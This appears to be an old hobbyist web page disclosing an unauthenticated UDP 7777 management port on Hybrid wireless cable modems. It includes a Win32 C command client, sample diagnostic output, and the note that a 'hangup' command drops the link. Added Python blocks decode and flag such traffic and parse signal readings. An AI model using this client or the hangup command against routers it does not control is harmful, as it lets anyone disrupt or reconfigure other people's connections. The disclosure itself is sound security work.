loopy.org:

email loopy@loopy.org
hybrid security:

I should preface this document with the following: I no longer have a Hybrid modem, and I no longer even live in a city that offers a wireless option. For these reasons, this document is no longer supported. Please don't email asking questions that are not answered here, as I have no way to answer them.


Anyway, a few years ago I went looking for a faster home Internet connection. I was outside the reach of any DSL carrier, and the Road Runner service from Warner wasn't supported in my neighborhood. Not being able to stomach shelling out $1200 a month for a T1, my choices were pretty slim. I wound up going with a company called Accelernet.

It is essentially a wireless cable modem: they use antennas to broadcast the data to your location. It wasn't perfect, but it seemed to fit my immediate needs.

Part of their equipment was a router/modem produced by a company called Hybrid. Given my curiosity and profession, it was only a matter of time until I began looking at what made it tick, and more importantly, how to manipulate that ticking.

The FTP server Hybrid runs had an application they developed called CCMInfo. It was a client-server application that communicated with the cable modem and returned diagnostic information such as signal strength, carrier voltage, etc.

Within minutes I had a sniffer capturing the data that was being transferred across the network. What I found was scary.

It seems these Hybrid routers have a diagnostic/management port open with no authentication in place. This network "feature" is UDP based, and everything is sent in clear text over the LAN.

Tsk, tsk, this is crappy engineering at its finest.


The Hybrid box listens on UDP 7777 for any packet it recognizes and sends a response back to the sender. In practice the device seemed to acknowledge every packet regardless of what you sent it.

At this point I went searching the web for information on this type of device and, hopefully, on this protocol. I stumbled across an application called Hybridcon. This was nothing more than a dummy app acting as a console for the router: it produced a shell-like effect, sending STDIN out via UDP and echoing the received packets to STDOUT. That app was written for a Unix host; I quickly made some modifications and ported it to Windows.

The following code is not entirely ANSI C; it is a client-server application written for a Win32 environment. Specifically, it needs Winsock to handle the TCP/IP functions. This code is free for anyone to use under the GPL license.

Due to several requests for a compiled version of this code, here is a win32 exe.

Frank Varnavas has contributed a Perl version of this application as well; click here to download.



#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <winsock.h>      /* link against wsock32.lib */

/* Print the last Winsock error (the original format string had "%" without the 's') */
#define PRINTERROR(s) fprintf(stderr, "\n%s: %d\n", s, WSAGetLastError())

SOCKET theSocket;
SOCKADDR_IN saServer;
LPHOSTENT lpHostEntry;

int sendcmd(char *cmd);
int docmd(char *cmd);

int main(int argc, char **argv)
{
 WORD wVersionRequested = MAKEWORD(1,1);
 WSADATA wsaData;
 char inbuf[1500] = {0};
 int keepgoing = 1;

 if (argc != 2)
  {
   fprintf(stderr, "\nSyntax: App IP\n");
   return 0;
  }
 if (WSAStartup(wVersionRequested, &wsaData) != 0)
  {
   fprintf(stderr, "\n WSAStartup failed\n");
   return 0;
  }
 if (wsaData.wVersion != wVersionRequested)
  {
   fprintf(stderr, "\n Wrong version\n");
   WSACleanup();
   return 0;
  }
 lpHostEntry = gethostbyname(argv[1]);
 if (lpHostEntry == NULL)
  {
   PRINTERROR("gethostbyname()");
   WSACleanup();
   return 0;
  }
 theSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
 if (theSocket == INVALID_SOCKET)
  {
   PRINTERROR("socket()");
   WSACleanup();
   return 0;
  }
 /* The Hybrid management (HSMP) port is UDP 7777 */
 saServer.sin_family = AF_INET;
 saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
 saServer.sin_port = htons(7777);

 /* Read commands from stdin until "exit" or EOF and send each one to the box */
 while (keepgoing)
  {
   memset(inbuf, 0, sizeof inbuf);
   printf("[...] ");
   if (fgets(inbuf, sizeof inbuf, stdin) == NULL)   /* EOF: stop instead of looping forever */
    break;
   if (!strncmp("exit", inbuf, 4))
    keepgoing = 0;
   else
    {
     inbuf[strcspn(inbuf, "\r\n")] = '\0';          /* strip the trailing newline, if any */
     if (strlen(inbuf))
      docmd(inbuf);
    }
  }
 closesocket(theSocket);
 WSACleanup();
 return 0;
}

/* Build and send one HSMP request: 20-byte fixed header, 2-byte big-endian
   command length, 6 reserved (zero) bytes, the command text and a terminating NUL */
int sendcmd(char *cmd)
{
  int framelen, rc;
  size_t cmdlen = strlen(cmd);
  unsigned char *frame;
  unsigned char hdr[] = {
    0x00, 0x00, 0x01, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x01, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x0f, 0x0a };

  framelen = 20 + 2 + 6 + (int)cmdlen + 1;
  frame = (unsigned char *)calloc(1, framelen);
  if (frame == NULL)
    return -1;
  memcpy(frame, hdr, 20);
  frame[20] = (unsigned char)((cmdlen >> 8) & 0xff);
  frame[21] = (unsigned char)(cmdlen & 0xff);
  /* bytes 22 - 27 stay zero (calloc) */
  memcpy(frame + 28, cmd, cmdlen);
  rc = sendto(theSocket, (const char *)frame, framelen, 0,
              (LPSOCKADDR)&saServer, sizeof(struct sockaddr));
  free(frame);                 /* the original leaked this buffer on every command */
  return rc;
}

/* Send one command and print the reply, skipping the 18-byte response header */
int docmd(char *cmd)
{
  char readbuf[1500] = {0};
  int n;
  if (sendcmd(cmd) < 0)
  {
   PRINTERROR("sendcmd");
   exit(-1);
  }
  /* leave room for the NUL so a full-size reply cannot write past the buffer */
  if ((n = recvfrom(theSocket, readbuf, sizeof(readbuf) - 1, 0, NULL, NULL)) < 0)
  {
   PRINTERROR("recvfrom");
   exit(-1);
  }
  readbuf[n] = '\0';
  if (n < 18)
  {
   fprintf(stderr, "short reply (%d bytes)\n", n);
   return -1;
  }
  printf("%s\n", readbuf + 18);
  return 0;
}
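As an added example (not part of the original page and not Hybrid's own code), here is a Python decoder for the request frame that sendcmd() above builds, written from the defender's side: it picks HSMP requests out of captured UDP datagrams and flags the disruptive commands this page describes, since the port needs no authentication and any request to it is worth logging. It assumes other clients send the same fixed 20-byte header the C code uses; the sample datagrams are constructed, not captured.

```python
import struct

HSMP_PORT = 7777
# 20-byte request header, taken from the hdr[] array in the C client above.
# Assumption: other HSMP clients send this same fixed header.
HSMP_HDR = bytes([0x00, 0x00, 0x01, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0x01, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x0f, 0x0a])
# Commands the page shows to be disruptive: hangup drops the return path,
# connect default re-dials and dumps session information.
DISRUPTIVE = {"hangup", "connect"}


def build_hsmp_request(cmd):
    """Mirror sendcmd(): header, 2-byte big-endian length, 6 zero bytes, command, NUL."""
    body = cmd.encode("ascii")
    return HSMP_HDR + struct.pack(">H", len(body)) + b"\x00" * 6 + body + b"\x00"


def parse_hsmp_request(payload):
    """Return the command carried by a UDP/7777 payload, or None if it is not
    shaped like an HSMP request (header, length field and NUL must agree)."""
    if len(payload) < 29 or payload[:20] != HSMP_HDR:
        return None
    (cmdlen,) = struct.unpack(">H", payload[20:22])
    end = 28 + cmdlen
    if len(payload) <= end or payload[end] != 0:
        return None
    return payload[28:end].decode("ascii", errors="replace")


def audit_datagrams(datagrams):
    """datagrams: iterable of (src_ip, dst_port, payload) as a capture tool hands
    them over. Returns (src_ip, command, severity) for every HSMP request seen."""
    findings = []
    for src, dport, payload in datagrams:
        if dport != HSMP_PORT:
            continue
        cmd = parse_hsmp_request(payload)
        if cmd is None:
            continue
        verb = cmd.split(None, 1)[0] if cmd.strip() else ""
        findings.append((src, cmd, "high" if verb in DISRUPTIVE else "info"))
    return findings


# Constructed sample traffic, not a capture from a real device.
SAMPLE = [
    ("192.0.2.10", 7777, build_hsmp_request("version")),
    ("198.51.100.7", 7777, build_hsmp_request("hangup")),
    ("192.0.2.10", 53, b"\x12\x34\x01\x00"),                              # unrelated datagram
    ("203.0.113.5", 7777, HSMP_HDR + b"\x00\x10" + b"\x00" * 6 + b"abc"),  # length field lies
]
```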




Now, to use the application, simply run the executable with the IP address of the box as the parameter.

c:\hybrid.exe 111.111.111.111
[...] version
HSMP transid 105 cmd [version]
Net time Sat Jul 22 03:58:12 2000
Hybrid NOS version 70918 Id 130167 Model 1WBR-O Configuration [955124260]

[...] ifco seeq0
HSMP transid 105 cmd [ifco seeq0]
seeq0 IP addr 111.111.111.111 MTU 1514
Link encap ethernet
Link addr 00:20:cd:01:fc:77
trace 0x0
netmask 0xffffff00
broadcast 111.111.111.255
sent: ip 5598 tot 8005 idle 4:03:13:13 qlen 0
recv: ip 11368 tot 0 idle 4:03:13:13

[...] qamstat
HSMP transid 105 cmd [qamstat]
QAM: in LOCK FEC: in LOCK SNRE: 0x03a4 F7: 0x5781
AGC: 1.93V BAUD: 2.40V CARRIER: 2.50V DEROTATOR: 46.2 KHz
RVRS0: 0x5a420100 RVRS1: 0x2000c000
i2cW=79076(rtry=0) i2cR=232688(rtry=0)

[...]

Note - The above section gives us some very useful information about the line strength and quality. "QAM: in LOCK" means it has a solid signal and is able to receive data. The next two values (SNRE and F7) are the helpful ones: together they represent the estimated signal-to-noise ratio in dB, which is a solid way to determine the signal strength of your antenna. You have to do a bit of hex-to-decimal conversion to get it, but that's simple enough: it is the sum of the two values divided by 1000.

0x03a4 = 932
0x5781 = 22401
Total = 23333 / 1000
Signal Quality = 23.34 dB
Signal Strength = 1.93V
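Added example, not from the original page: a small parser that pulls the lock state, the SNRE/F7 values and the AGC voltage out of a qamstat reply and applies the formula above. The 20 dB threshold in link_summary() is an assumed example value, not something the page states.

```python
import re

# Field layout of the qamstat reply as shown on this page; the SNR formula
# (SNRE + F7, divided by 1000) is the one the page gives.
QAM_RE = re.compile(r"QAM:\s*(.+?)\s+FEC:\s*(.+?)\s+SNRE:\s*(0x[0-9a-f]+)\s+F7:\s*(0x[0-9a-f]+)", re.I)
AGC_RE = re.compile(r"AGC:\s*([0-9.]+)\s*V", re.I)


def parse_qamstat(text):
    """Parse a qamstat reply into lock state, SNR estimate (dB) and AGC voltage.
    Returns None if the SNRE/F7 line is missing."""
    m = QAM_RE.search(text)
    if m is None:
        return None
    qam, fec, snre, f7 = m.groups()
    snre_v, f7_v = int(snre, 16), int(f7, 16)
    agc = AGC_RE.search(text)
    return {
        "qam_locked": qam.strip().upper() == "IN LOCK",
        "fec_locked": fec.strip().upper() == "IN LOCK",
        "snre": snre_v,
        "f7": f7_v,
        "snr_db": (snre_v + f7_v) / 1000.0,
        "agc_volts": float(agc.group(1)) if agc else None,
    }


def link_summary(stats, min_snr_db=20.0):
    """One-line health verdict. min_snr_db is an assumed example threshold."""
    if stats is None:
        return "no qamstat data"
    if not (stats["qam_locked"] and stats["fec_locked"]):
        return "NOT LOCKED"
    state = "ok" if stats["snr_db"] >= min_snr_db else "weak"
    return "%s: SNR %.2f dB, AGC %sV" % (state, stats["snr_db"], stats["agc_volts"])


# The qamstat output quoted on this page.
QAMSTAT_TEXT = """\
QAM: in LOCK FEC: in LOCK SNRE: 0x03a4 F7: 0x5781
AGC: 1.93V BAUD: 2.40V CARRIER: 2.50V DEROTATOR: 46.2 KHz
RVRS0: 0x5a420100 RVRS1: 0x2000c000
i2cW=79076(rtry=0) i2cR=232688(rtry=0)
"""
```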


Try various other commands.

ifco is an ifconfig equivalent; it can be used on all of the internal routing interfaces: seeq0, seeq1, sl0, etc.

ee rf setup, or asys lead to some interesting information, as do many more. Experimentation is a wonderful thing here. Have fun.

Something I found a little disturbing was that this box actually accepts a line reading hangup. This drops the return path side, effectively killing the interface, and with it the route and your network.

PS - if you do type in hangup and want to get it back without rebooting the box, try connect default. Not only will it reconnect you, but it will also dump the session information to the screen: the number dialed with AT strings, the connection speed, etc.


So, the ugly bottom line is that, using the HSMP UDP protocol, any Hybrid router can be reconfigured or downed at any time by anyone on the Internet. That is, as we network people say, pure crap.